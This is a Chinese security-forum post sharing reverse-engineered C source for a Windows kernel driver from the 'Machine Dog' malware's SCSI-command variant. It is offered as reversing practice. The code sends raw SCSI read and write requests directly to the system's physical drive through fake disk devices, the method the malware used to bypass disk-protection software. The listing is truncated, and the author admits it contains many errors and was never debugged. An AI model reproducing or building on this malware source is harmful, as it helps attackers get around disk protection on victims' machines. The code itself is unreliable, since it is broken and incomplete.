[原创]机器狗SCSI命令版逆向代码
文章作者:Eros412信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
简介:前阵子xIkUg发了个机器狗的SCSI命令版,拿来练习下,:loveliness:[code]//By:Eros412
#include<ntddk.h>
#include<ntdddisk.h>
#include<ntddcdrm.h>
#include<srb.h>
#include<stdio.h>
#define DWORD unsigned long
#define WORD unsigned short
#define BYTE unsigned char
#define BOOLEAN BYTE
PDEVICE_OBJECT deviceobject;
PFILE_OBJECT physdriv_fo;
PDEVICE_OBJECT physdriv_do;
HANDLE dirhand;
typedef struct _DISK_STRUCT {
LARGE_INTEGER disksize;
ULONG unused;
WORD sectorsize;
BYTE byte;
} DISK_STRUCT, *PDISK_STRUCT;
typedef struct _INFO_STRUCT {
ULONG byte;
LARGE_INTEGER disksize;
} INFO_STRUCT, *PINFO_STRUCT;
typedef struct _DEVICE_EXTENSION
{
PDISK_STRUCT diskstruct;
BOOLEAN media;
BOOLEAN unused;
LIST_ENTRY mylist;
KSPIN_LOCK spinlock;
KEVENT event;
PKTHREAD thread;
BOOLEAN thread_stop;
} DEVICE_EXTENSION, *PDEVICE_EXTENSION;
typedef struct _SENSE_DATA {
BYTE Valid;
BYTE SegmentNumber;
BYTE FileMark;
BYTE Information[4];
BYTE AdditionalSenseLength;
BYTE CommandSpecificInformation[4];
BYTE AdditionalSenseCode;
BYTE AdditionalSenseCodeQualifier;
BYTE FieldReplaceableUnitCode;
BYTE SenseKeySpecific[3];
} SENSE_DATA, *PSENSE_DATA;
typedef enum _PARTITION_STYLE {
PARTITION_STYLE_MBR,
PARTITION_STYLE_GPT
} PARTITION_STYLE;
typedef struct _PARTITION_INFORMATION_GPT {
GUID PartitionType;
GUID PartitionId;
ULONG64 Attributes;
WCHAR Name [36];
} PARTITION_INFORMATION_GPT, *PPARTITION_INFORMATION_GPT;
typedef struct _PARTITION_INFORMATION_MBR {
UCHAR PartitionType;
BOOLEAN BootIndicator;
BOOLEAN RecognizedPartition;
ULONG HiddenSectors;
} PARTITION_INFORMATION_MBR, *PPARTITION_INFORMATION_MBR;
typedef struct _PARTITION_INFORMATION_EX {
PARTITION_STYLE PartitionStyle;
LARGE_INTEGER StartingOffset;
LARGE_INTEGER PartitionLength;
ULONG PartitionNumber;
BOOLEAN RewritePartition;
union {
PARTITION_INFORMATION_MBR Mbr;
PARTITION_INFORMATION_GPT Gpt;
};
} PARTITION_INFORMATION_EX, *PPARTITION_INFORMATION_EX;
typedef struct _GET_LENGTH_INFORMATION {
LARGE_INTEGER Length;
} GET_LENGTH_INFORMATION, *PGET_LENGTH_INFORMATION;
#define IOCTL_DISK_GET_LENGTH_INFO CTL_CODE(IOCTL_DISK_BASE, 0x0017, METHOD_BUFFERED, FILE_READ_ACCESS)
#define IOCTL_DISK_GET_PARTITION_INFO_EX CTL_CODE(IOCTL_DISK_BASE, 0x0012, METHOD_BUFFERED, FILE_ANY_ACCESS)
int DeRefFileObject(PDEVICE_OBJECT DeviceObject, PFILE_OBJECT FileObject){
ObDereferenceObject(FileObject);
DeviceObject=NULL;
FileObject=NULL;
return 0;
}
int __stdcall EndThread(PDEVICE_OBJECT DeviceObject)
{
PDEVICE_EXTENSION dev_ext=DeviceObject->DeviceExtension;
dev_ext->thread_stop=1;
KeSetEvent(&dev_ext->event,0,0);
KeWaitForSingleObject(&dev_ext->thread,0,0,0,0);
ObDereferenceObject(dev_ext->thread);
IoDeleteDevice(DeviceObject);
return 0;
}
VOID DriverUnload(IN PDRIVER_OBJECT DriverObject)
{
int var=0;
WORD num;
wchar_t dos_name[30];
PDEVICE_OBJECT dev;
PDEVICE_OBJECT next;
UNICODE_STRING us;
UNICODE_STRING dos_us;
RtlInitUnicodeString(&us,L"\\DosDevices\\zzzxxx");
IoDeleteSymbolicLink(&us);
IoDeleteDevice(deviceobject);
deviceobject=NULL;
dev=DriverObject->DeviceObject;
while(dev)
{
wcscpy(dos_name,L"\\DosDevices\\yyy");
num=(WORD )var;
if(var<=9){
num=num+0x30;
dos_name[15]=num;
dos_name[16]=0x00;
}
else if(var<20&&var>9){
dos_name[15]=0x31;
num=num+0x26;
dos_name[16]=num;
dos_name[17]=0x00;
}
else{
dos_name[15]=0x32;
num=num+0x1C;
dos_name[16]=num;
dos_name[17]=0x00;
}
RtlInitUnicodeString(&dos_us,dos_name);
IoDeleteSymbolicLink(&dos_us);
next=dev->NextDevice;
EndThread(dev);
dev=next;
var++;
}
ZwClose(dirhand);
DeRefFileObject(physdriv_do,physdriv_fo);
}
int __stdcall SendCommandCompletion( IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp,IN PVOID Context){
Irp->UserIosb->Status=Irp->IoStatus.Status;
Irp->UserIosb->Information=Irp->IoStatus.Information;
if(Context!=0)
if(Irp->MdlAddress){
MmUnlockPages(Irp->MdlAddress);
IoFreeMdl(Irp->MdlAddress);
}
KeSetEvent(Irp->UserEvent,0,0);
IoFreeIrp(Irp);
return STATUS_MORE_PROCESSING_REQUIRED;
}
int __stdcall SendCommand(PDEVICE_OBJECT DeviceObject, int MajorFunction, PVOID Buffer, int SectorOffset, int SendSectorCount){
PSCSI_REQUEST_BLOCK srb;
PIO_STACK_LOCATION isl;
PIRP irp;
PMDL mdl;
PSENSE_DATA sense;
ULONG length,length2,TimeOutValue;
KEVENT event;
IO_STATUS_BLOCK IoStatus;
int trytime=8;
int Operation;
int majorfunc=MajorFunction,mj_read=IRP_MJ_READ;
int flags;
int offset,cdb0;
tryhere:
srb=ExAllocatePoolWithTag(0,sizeof(SCSI_REQUEST_BLOCK),0x206B6444);
sense=ExAllocatePoolWithTag(0,sizeof(SENSE_DATA),0x206B6444);
if(srb==NULL||sense==NULL)
goto error;
RtlZeroMemory(sense,sizeof(SENSE_DATA));
RtlZeroMemory(srb,sizeof(SCSI_REQUEST_BLOCK));
srb->Length=sizeof(SCSI_REQUEST_BLOCK);
srb->Function=SRB_FUNCTION_EXECUTE_SCSI ;
srb->DataBuffer=Buffer;
length=SendSectorCount<<9;
srb->DataTransferLength=length;
srb->QueueAction= SRB_SIMPLE_TAG_REQUEST;
srb->SrbStatus= SRB_STATUS_PENDING;
srb->ScsiStatus= SRB_STATUS_PENDING;
srb->NextSrb=NULL;
srb->SenseInfoBuffer=sense;
srb->SenseInfoBufferLength=sizeof(SENSE_DATA);
_asm {
push edi
push esi
mov edi,majorfunc
mov esi,mj_read
cmp edi,esi
setnz al
pop edi
pop esi
dec eax
and eax, 0FFFFFFC0h
add eax, 80h
or eax, 40000100h
mov flags,eax
}
srb->SrbFlags=flags;
if(MajorFunction== IRP_MJ_READ)
srb->SrbFlags|=0x200;
*(BYTE*)(&srb->SrbFlags+0x02)|=0x20;
length2=sizeof(SCSI_REQUEST_BLOCK);
_asm{
mov eax,length2
and eax,0xFFFF
neg eax
sbb eax,eax
neg eax
mov ecx,length2
shr ecx,0x10
add eax,ecx
lea eax,[eax+eax*4]
shl eax,1
mov eax ,TimeOutValue
}
srb->TimeOutValue=TimeOutValue;
srb->QueueSortKey=SectorOffset;
srb->CdbLength=0x0A;
if(MajorFunction!= IRP_MJ_READ)
srb-> Cdb[1]|=0x08;
offset=SectorOffset;
offset=offset>>0x18;
srb-> Cdb[2]=(BYTE)offset;
offset=SectorOffset;
offset=offset>>0x10;
srb-> Cdb[3]=(BYTE)offset;
offset=SectorOffset;
offset=offset>>0x08;
srb-> Cdb[4]=(BYTE)offset;
srb-> Cdb[5]=(BYTE)SectorOffset;
offset=SendSectorCount;
offset=offset>>0x08;
srb-> Cdb[7]=(BYTE)offset;
srb-> Cdb[8]=(BYTE)SectorOffset;
_asm
{
mov eax,SectorOffset
push edi
push esi
mov edi,majorfunc
mov esi,mj_read
cmp edi,esi
setnz al
pop edi
pop esi
lea eax,[eax+eax+0x28]
mov cdb0,eax
}
srb-> Cdb[0]=(BYTE)cdb0;
KeInitializeEvent(&event,0,0);
irp=IoAllocateIrp(DeviceObject->StackSize,0);
if(irp==NULL)
goto error;
mdl=IoAllocateMdl(Buffer,length,0,0,irp);
if(mdl==NULL)
goto freepool;
_asm{
xor ecx,ecx
push edi
push esi
mov edi,majorfunc
mov esi,mj_read
cmp edi,esi
setnz cl
mov Operation,ecx
pop edi
pop esi
}
MmProbeAndLockPages(mdl,0,Operation);
srb->OriginalRequest=irp;
irp->UserIosb=&IoStatus;
irp->UserEvent=&event;
irp->IoStatus.Status=0;
irp->IoStatus.Information=0;
irp->Flags= IRP_SYNCHRONOUS_API | IRP_NOCACHE;
irp->AssociatedIrp.SystemBuffer=NULL;
irp->Cancel=0;
irp->RequestorMode=0;
irp->CancelRoutine=NULL;
irp->Tail.Overlay.Thread=(PETHREAD)KeGetCurrentThread();
isl=IoGetNextIrpStackLocation(irp);
isl->DeviceObject= DeviceObject;
isl->MajorFunction= IRP_MJ_INTERNAL_DEVICE_CONTROL;
isl->Parameters.Scsi.Srb=srb;
IoSetCompletionRoutine(irp,SendCommandCompletion,srb,1,1,1);
if(IoCallDriver(DeviceObject,irp)==STATUS_PENDING)
KeWaitForSingleObject(&event,0,0,0,0);
if(srb->SenseInfoBuffer!=sense||srb->SenseInfoBuffer!=0)
{ExFreePool(srb->SenseInfoBuffer);
}
ExFreePool(srb);
ExFreePool(sense);
if(IoStatus.Status==0||trytime==0)
return 0;
KeStallExecutionProcessor(1);
--trytime;
goto tryhere;
freepool:
ExFreePool(srb);
ExFreePool(sense);
IoFreeIrp(irp);
error:
return STATUS_INSUFFICIENT_RESOURCES;
}
int __stdcall DoReadWrite(PDEVICE_OBJECT DeviceObject,UCHAR MajorFunction,PIO_STATUS_BLOCK IoStatus,PLARGE_INTEGER BytesOffset, PVOID Buffer, int Length){
int SendSectorCount;
int SectorOffset;
LARGE_INTEGER offset=*(PLARGE_INTEGER)BytesOffset;
Length=Length>>9;
offset.QuadPart=offset.QuadPart>>9;
SectorOffset=offset.LowPart;
if(Buffer==NULL);
goto end_now;
if(Length>0x100)
SendSectorCount=0x100;
else
SendSectorCount=Length;
while(0<Length){
Length-=SendSectorCount;
if(SendCommand(DeviceObject,MajorFunction,Buffer,SectorOffset,SendSectorCount)!=0)
return 1;
(ULONG)Buffer+=SendSectorCount<<9;
}
return 0;
end_now:
IoStatus->Status=0;
IoStatus->Information=Length;
return 0;
}
int __stdcall mycall(PVOID incoming, PVOID param)
{
LARGE_INTEGER temp;
LARGE_INTEGER bytesoffset;
PIRP IRP=(PIRP)param;
PIO_STACK_LOCATION isl;
PDEVICE_EXTENSION dev_ext;
ULONG readlength;
ULONG offsethighpart;
ULONG highpart;
ULONG test1;
ULONG test2;
dev_ext=(PDEVICE_EXTENSION)incoming;
isl=IoGetCurrentIrpStackLocation(IRP);
temp.QuadPart=isl->Parameters.Read.ByteOffset.QuadPart/0x200;
temp.LowPart+=dev_ext->diskstruct->disksize.LowPart;
bytesoffset.HighPart=temp.LowPart;
if((BYTE)IRP->MdlAddress->MdlFlags==0x05){
incoming=MmMapLockedPagesSpecifyCache(IRP->MdlAddress,0,1,0,0,0x10);
}
incoming=IRP->MdlAddress->MappedSystemVa;
readlength=isl->Parameters.Read.Length;
readlength=readlength>>9;
offsethighpart=bytesoffset.HighPart;
highpart=dev_ext->diskstruct->disksize.HighPart;
test1=dev_ext->diskstruct->disksize.HighPart+dev_ext->diskstruct->disksize.LowPart-1;
test2=readlength+offsethighpart-1;
if(offsethighpart>test1||test2>highpart||offsethighpart<dev_ext->diskstruct->disksize.LowPart)
goto end_now;
IRP->IoStatus.Status=0;
IRP->IoStatus.Information=0;
bytesoffset.QuadPart=dev_ext->diskstruct->disksize.LowPart+isl->Parameters.Read.ByteOffset.LowPart;
bytesoffset.HighPart+=0x40000+isl->Parameters.Read.ByteOffset.HighPart;
DoReadWrite(physdriv_do,isl->MajorFunction,&IRP->IoStatus,&bytesoffset,incoming,isl->Parameters.Read.Length);
return IRP->IoStatus.Status ;
end_now:
return STATUS_IO_DEVICE_ERROR;
}
VOID __stdcall system_thread_routine(PVOID Context){
PIRP irp;
PLIST_ENTRY entry;
PDEVICE_EXTENSION dev_ext;
PIO_STACK_LOCATION isl;
dev_ext=((PDEVICE_OBJECT)Context)->DeviceExtension;
KeSetPriorityThread(KeGetCurrentThread(),0x10);
for(;;)
{
KeWaitForSingleObject(&dev_ext->event,0,0,0,0);
if(dev_ext->thread_stop)
PsTerminateSystemThread(0);
entry=ExInterlockedRemoveHeadList(&dev_ext->mylist,&dev_ext->spinlock);
if(entry!=0)
{
irp=CONTAINING_RECORD(entry, IRP, Tail.Overlay.ListEntry);
isl=IoGetCurrentIrpStackLocation(irp);
if(isl->MajorFunction==IRP_MJ_READ||isl->MajorFunction==IRP_MJ_WRITE)
{
irp->IoStatus.Information=0;
mycall(dev_ext,irp);
}
irp->IoStatus.Status=STATUS_DRIVER_INTERNAL_ERROR;
irp->IoStatus.Information=0;
IoCompleteRequest(irp,0);
}
}
}
int __stdcall CreateDevice(PDRIVER_OBJECT DriverObject, int DeviceNumber){
wchar_t dev_name[30];
wchar_t dos_name[30];
UNICODE_STRING dev_us;
UNICODE_STRING dos_us;
PDEVICE_OBJECT dev_ob;
NTSTATUS status;
PDEVICE_EXTENSION dev_ext;
ULONG addr;
HANDLE thread_hand;
WORD num=(WORD )DeviceNumber;
wcscpy(dev_name,L"\\Device\\zzz\\zzz");
wcscpy(dos_name,L"\\DosDevices\\yyy");
if(num<=9){
num=num+0x30;
dev_name[15]=dos_name[15]=num;
dev_name[16]=dos_name[16]=0x00;
}
else if(num<20&&num>9){
dev_name[15]=dos_name[15]=0x31;
num=num+0x26;
dev_name[16]=dos_name[16]=num;
dev_name[17]=dos_name[17]=0x00;
}
else{
dev_name[15]=dos_name[15]=0x32;
num=num+0x1C;
dev_name[16]= dos_name[16]=num;
dev_name[17]=dos_name[17]=0x00;
}
RtlInitUnicodeString(&dev_us,dev_name);
RtlInitUnicodeString(&dos_us,dos_name);
// DbgPrint("%S %S",dev_us.Buffer,dos_us.Buffer);
if(IoCreateDevice(DriverObject,0x27,&dev_us, FILE_DEVICE_DISK,0x00,0x00,&dev_ob)!=0)
return 1;
dev_ob->Flags|=0x10;
dev_ext=dev_ob->DeviceExtension;
dev_ext->media=0;
if(IoCreateSymbolicLink(&dos_us,&dev_us)!=0){
IoDeleteDevice(dev_ob);
return 1;
}
addr=(ULONG)dev_ext;
addr+=6;
dev_ext->mylist.Blink=(LIST_ENTRY*)addr;
dev_ext->mylist.Flink=dev_ext->mylist.Blink;
KeInitializeSpinLock(&dev_ext->spinlock);
KeInitializeEvent(&dev_ext->event,1,0);
dev_ext->thread_stop=0;
if(PsCreateSystemThread(&thread_hand,0,0,0,0,system_thread_routine,dev_ob)!=0){
IoDeleteDevice(dev_ob);
return 1;
}
if(ObReferenceObjectByHandle(thread_hand,0x1F03FF,0,0,&dev_ext->thread,0)!=0){
dev_ext->thread_stop=1;
ZwClose(thread_hand);
KeSetEvent(&dev_ext->event,0,0);
}
ZwClose(thread_hand);
return 0;
}
int GetSystemDriveIndex(){
BYTE drive_char;
HANDLE link_handle;
ANSI_STRING ansi;
UNICODE_STRING us,us2;
OBJECT_ATTRIBUTES oa;
DWORD result=0x40000000;
NTSTATUS status;
ULONG ret;
PCONFIGURATION_INFORMATION config_info;
if(KeGetCurrentIrql()>0)
return 0x40000000;
config_info=IoGetConfigurationInformation();
if(config_info->DiskCount==1)
return 0;
RtlInitUnicodeString(&us,L"\\arcname\\multi(0)disk(0)rdisk(0)");
oa.Length=0x18;
oa.RootDirectory=0x00;
oa.Attributes=0x50;
oa. ObjectName=&us;
oa.SecurityDescriptor=0x00;
oa.SecurityQualityOfService=0x00;
if(ZwOpenSymbolicLinkObject(&link_handle, GENERIC_READ,&oa))
return result;
RtlInitUnicodeString(&us2,L"\\device\\harddisk000\\partition000\\winnt");
if(ZwQuerySymbolicLinkObject(link_handle,&us2,&ret))
return result;
RtlUnicodeStringToAnsiString(&ansi,&us,1);
if(ansi.Buffer[0x11]=='\\')
{
drive_char=ansi.Buffer[0x10];
drive_char-=0x30;
result=drive_char;
RtlFreeAnsiString(&ansi);
return result;
}
drive_char=ansi.Buffer[0x11];
drive_char-=0x30;
result=drive_char;
drive_char=ansi.Buffer[0x10];
drive_char*=0x0A;
drive_char+=(BYTE)result;
result=drive_char;
RtlFreeAnsiString(&ansi);
return result;
}
int GetPhysicalDriveObject(PDEVICE_OBJECT *DeviceObject, PFILE_OBJECT *FileObject)
{
ULONG index;
UNICODE_STRING us;
wchar_t globaldrivex[30];
wchar_t drivex[30];
index=GetSystemDriveIndex();
if(index== 0x40000000)
index=0;
wcscpy(globaldrivex,L"\\GLOBAL??\\PhysicalDrive");
globaldrivex[23]=(WORD)index+0x30;
globaldrivex[24]=0;
wcscpy(drivex,L"\\??\\PhysicalDrive");
drivex[17]=(WORD)index+0x30;
drivex[18]=0;
RtlInitUnicodeString(&us,globaldrivex);
if(IoGetDeviceObjectPointer(&us,FILE_READ_ATTRIBUTES,FileObject,DeviceObject))
{
RtlInitUnicodeString(&us,drivex);
if(IoGetDeviceObjectPointer(&us,FILE_READ_ATTRIBUTES,FileObject,DeviceObject))
return 1;
}
*DeviceObject=(*FileObject)->DeviceObject;
return 0;
}
NTSTATUS DispatchCreateClose(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){
Irp->IoStatus.Status=0;
Irp->IoStatus.Information=1;
IofCompleteRequest(Irp,0);
return 0;
}
NTSTATUS DispatchReadWrite(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp){
PDEVICE_EXTENSION dev_ext= DeviceObject->DeviceExtension;
PIO_STACK_LOCATION isl;
if(!dev_ext->media)
{
goto end_here;
return 0;
}
if(!physdriv_do)
if(GetPhysicalDriveObject(&physdriv_do,&physdriv_fo))
{Irp->IoStatus.Status=STATUS_NO_MEDIA_IN_DEVICE;
goto end_here;
return 0;
}
isl=IoGetCurrentIrpStackLocation(Irp);
if(isl->Parameters.Read.Length==0){
Irp->IoStatus.Status=0;
goto end_here;
}
isl->Control|=SL_PENDING_RETURNED;
ExInterlockedInsertTailList(&dev_ext->mylist,&Irp->Tail.Overlay.ListEntry,&dev_ext->spinlock);
KeSetEvent(&dev_ext->event,0,0);
return STATUS_PENDING;
end_here:
Irp->IoStatus.Information=0;
IoCompleteRequest(Irp,0);
return 0;
}
NTSTATUS DispatchDeviceControl(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp){
PDEVICE_EXTENSION dev_ext;
PIO_STACK_LOCATION isl;
PVOID inputbuffer;
NTSTATUS status;
isl=IoGetCurrentIrpStackLocation(Irp);
dev_ext=DeviceObject->DeviceExtension;
if(dev_ext->media)
{if(isl->Parameters.DeviceIoControl.IoControlCode==0x8000F800){
switch(isl->Parameters.DeviceIoControl.IoControlCode)
{
case IOCTL_DISK_GET_CACHE_INFORMATION:
if(isl->Parameters.DeviceIoControl.OutputBufferLength<0x18)
{
status=STATUS_INVALID_PARAMETER;
Irp->IoStatus.Information=0;
}
else{
PDISK_CACHE_INFORMATION disk_cache=(PDISK_CACHE_INFORMATION )Irp->AssociatedIrp.SystemBuffer;
disk_cache->ParametersSavable=0;
disk_cache->ReadCacheEnabled=0;
disk_cache->WriteCacheEnabled=0;
status=0;
Irp->IoStatus.Information=0x18;
}
break;
case IOCTL_DISK_VERIFY:
if(isl->Parameters.DeviceIoControl.InputBufferLength>0x10)
{PVERIFY_INFORMATION verify=(PVERIFY_INFORMATION)Irp->AssociatedIrp.SystemBuffer;
Irp->IoStatus.Information=verify->Length;
status=0;
}
else
{status= STATUS_INVALID_PARAMETER;
Irp->IoStatus.Information=0;
}
break;
case IOCTL_CDROM_READ_TOC:
if(isl->Parameters.DeviceIoControl.InputBufferLength>0x324)
{PCDROM_TOC toc=(PCDROM_TOC )Irp->AssociatedIrp.SystemBuffer;
RtlZeroMemory(toc, sizeof(CDROM_TOC));
toc->FirstTrack=1;
toc->LastTrack=1;
toc->TrackData->Control&=0xF0;
toc->TrackData->Control|=0x04;
status=0;
Irp->IoStatus.Information=324;
}
else
{status= STATUS_BUFFER_TOO_SMALL;
Irp->IoStatus.Information=0;
}
break;
case IOCTL_DISK_GET_DRIVE_GEOMETRY:
case IOCTL_CDROM_GET_DRIVE_GEOMETRY:
if(isl->Parameters.DeviceIoControl.OutputBufferLength>0x18){
PDISK_GEOMETRY geometry=(PDISK_GEOMETRY)Irp->AssociatedIrp.SystemBuffer;
LARGE_INTEGER partitionsectorcount;
partitionsectorcount.LowPart=dev_ext->diskstruct->disksize.HighPart;
partitionsectorcount.HighPart=0;
partitionsectorcount.QuadPart=partitionsectorcount.QuadPart<<9;
geometry->Cylinders.QuadPart = partitionsectorcount.QuadPart/ 0x10000;
geometry->MediaType = FixedMedia;
geometry->TracksPerCylinder = 0x10;
geometry->SectorsPerTrack = 0x08;
geometry->BytesPerSector = 512;
status=0;
Irp->IoStatus.Information=18;
}
else
{status= STATUS_BUFFER_TOO_SMALL;
Irp->IoStatus.Information=0;
}
case IOCTL_DISK_SET_PARTITION_INFO:
if(isl->Parameters.DeviceIoControl.InputBufferLength<1 ){
status=0x0C000000D;
Irp->IoStatus.Information=0;
}
else
{
status=0;
Irp->IoStatus.Information=0;
}
break;
case IOCTL_STORAGE_MEDIA_REMOVAL:
case IOCTL_DISK_MEDIA_REMOVAL:
case IOCTL_STORAGE_CHECK_VERIFY2:
case IOCTL_DISK_CHECK_VERIFY:
case IOCTL_STORAGE_CHECK_VERIFY:
case IOCTL_CDROM_CHECK_VERIFY:
status=0;
Irp->IoStatus.Information=0;
break;
case IOCTL_DISK_IS_WRITABLE:
status=0;
Irp->IoStatus.Status=0;
Irp->IoStatus.Information=0;
break;
附件里继续。。。
[/code]
[[i] 本帖最后由 eros412 于 2008-4-1 15:13 编辑 [/i]] 有精力的话逆下360的 SafeBoxKrnl.sys啊
有些地方还是很猥亵的:loveliness: *** 作者被禁止或删除 内容自动屏蔽 *** 这个代码错误很多,没时间修改、调试
[[i] 本帖最后由 eros412 于 2008-8-23 21:59 编辑 [/i]]
页:
[1]